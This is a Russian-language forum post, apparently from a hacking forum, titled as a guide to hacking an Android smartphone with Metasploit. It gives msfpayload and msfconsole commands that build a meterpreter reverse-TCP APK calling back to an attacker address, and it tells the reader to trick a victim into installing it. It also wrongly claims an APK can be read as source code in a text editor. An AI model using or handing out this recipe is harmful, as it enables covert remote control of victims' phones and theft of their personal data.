• Форум доступен на основном домене:
    временно не доступен olymprc.biz
    olymprc.com
    И также в TOR сети по ссылке:

    olymp3z5tdjywb2piewcrqqtrtmkgexhrzpytnq2vuli5dpjdu764wyd.onion
    Если основной домен не доступен, то можете использовать зеркала:
    olymprc54rbqyfv3ddr2jwdqzvrayed7zg4d7izvm6sreha5ax6wtwyd.onion
    olymp4e74mzx74pz5tzryfr7slh3azefmu4cchg5vzoqzeqovuvj6gid.onion

Взламываем Android-смартфон с помощью Metasploit

  • Автор темы JOUR
  • Дата начала

JOUR

Служба безопасности с плюхами
Контент форума
Регистрация
10/9/18
Заметки
0
Сообщения
51,363
Симпатии
22,711
Репутация
35,374
#1


В наше время смартфоны уже давно перестали быть редкостью или роскошью, и конечно они стали лакомой целью для злоумышленников, т.к. в них сейчас храниться масса личной информации. Думаю и нам настало время испытать безопасность одного из популярных смартфонов под управлением Android.

Исходная информация:

IP адрес атакующего: 192.168.8.94

Порт атакующего: 443

Что понадобиться:

  1. Metasploit framework (есть в Kali Linux)
2. Android-смартфон (на нашем столе HTC One с Android 4.4 KitKat)

Приступим к созданию эксплоита

  1. Запускаем терминал
2. Создаем apk-пакет с данными, следующей командой:

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.8.94 LPORT=443 R > hack.apk

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.8.94 LPORT=443 R > hack.apk

Т.к. мы будем делать эксплоит с обратным подключением, т.е. смартфон жертвы должен будет соединиться с компьютером атакующего, нам надо создать слушатель на указанном порту, для этого выполняем следующие команды:

msfconsole
use exploit/multi/handle
set payload android/meterpreter/reverse_tcp
set lhost 192.168.8.94
set lport 443
exploit

(Команда exploit запускает прослушку входящих соединений на порту 443)

Далее нам надо каким-либо образом заставить жертву запустить hack.apk сделанный нами ранее.

После того как жертва запустит этот файл на экране появится что-то похожее на:

WipeOut51_19_2022_055127.255000.jpg

Это говорит о том, что смартфон соединился с нашим компьютером и теперь мы можем им управлять из нашей консоли, вот пример:

WipeOut53_19_2022_055308.106000.jpg

Итог:

  1. Никогда не устанавливайте apk-пакеты из неизвестных источников
2. Если уж вы задумали установить, что-то подозрительное, то вы всегда можете вскрыть apk файл в текстовом редакторе и изучить его исходный код.
 
Сверху